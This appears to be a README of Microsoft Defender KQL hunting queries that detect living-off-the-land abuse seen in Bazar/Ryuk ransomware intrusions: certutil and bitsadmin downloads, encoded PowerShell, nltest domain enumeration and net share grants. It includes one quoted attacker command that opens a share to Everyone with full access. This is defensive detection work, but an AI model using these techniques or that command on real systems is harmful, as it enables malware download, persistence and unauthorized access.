This repo contains some personal queries I developed for MS Defender Security Center for known threats
Hope can be useful. If you find any FP or you want suggest some modification please send a PR
Detection queries based on Living Off The Land Binaries and Scripts (LOLBAS) criteria
Certutil.exe is a Windows binary used for handeling certificates; the query detects download and encode/decode operations
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "CertUtil.exe"
| where ProcessCommandLine contains "://" or ProcessCommandLine contains "-encode" or ProcessCommandLine contains "-decode"
Detection opportunities highlighted in Red Canary blog post A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak
DeviceProcessEvents
| where InitiatingProcessFileName == "cmd.exe"
| where ProcessCommandLine matches regex "^$"
| where FileName has_any("net.exe", "explorer.exe", "nltest.exe")
DeviceProcessEvents
| where FileName == "nltest.exe"
| where ProcessCommandLine has_any("/dclist:", "/domain_trusts", "/all_trusts")
DeviceProcessEvents
| where FileName == "net.exe"
// exclude local PC groups enumeration from the results, can generate FP
// e.g. you have hits for local groups when Defender ATP collects the investigation package
| where ProcessCommandLine !contains "localgroup"
| where ProcessCommandLine contains "group"
DeviceProcessEvents
| where FileName == "svchost.exe"
| where InitiatingProcessFileName !in ("services.exe", "MsMpEng.exe")
// exclude from the search parent process svchost.exe with -k option
| where not(InitiatingProcessFileName == "svchost.exe" and InitiatingProcessCommandLine contains "-k")
TODO: I see some False Positive, try to improve the search
DeviceProcessEvents
| where FileName == "svchost.exe"
| where ProcessCommandLine matches regex "^$"
// exclude from the search parent process svchost.exe with -k option
| where not(InitiatingProcessFileName == "svchost.exe" and InitiatingProcessCommandLine contains "-k")
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "-encodedcommand"
DeviceProcessEvents
| where FileName == "powershell.exe"
| where InitiatingProcessFileName == "cmd.exe"
| where InitiatingProcessParentFileName == "wmiprvse.exe"
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine matches regex "^$"
TODO: implemnent connection check for the process
Check Detection Opportunity 3
DeviceProcessEvents
| where FileName == "adfind.exe"
Detection steps highlighted in Vitali Kremez blog post Anatomy of Attack: Inside BazarBackdoor to Ryuk Ransomware "one" Group via Cobalt Strike
DeviceProcessEvents
| where FileName == "net.exe"
| where ProcessCommandLine contains "view"
// exclude FP
| where ProcessCommandLine !contains "vmware-view-usbd"
DeviceProcessEvents
| where FileName == "net.exe"
| where ProcessCommandLine has "share" and ProcessCommandLine contains "GRANT"
Check for a GRANT; on the post Vitali shows a FULL access to Everyone net share aaa$=C:\aaa /GRANT:Everyone,FULL
Detection of bitsadmin.exe usage to download malware and create persistence as shown in FireEye post Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
| where ProcessCommandLine contains "/addfile"
Check using bitsadmin to create a job that downloads an executable (malware) and stores it somewhere
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
| where ProcessCommandLine contains "/SetNotifyCmdLine"
Check using bitsadmin to create a job to gain persistence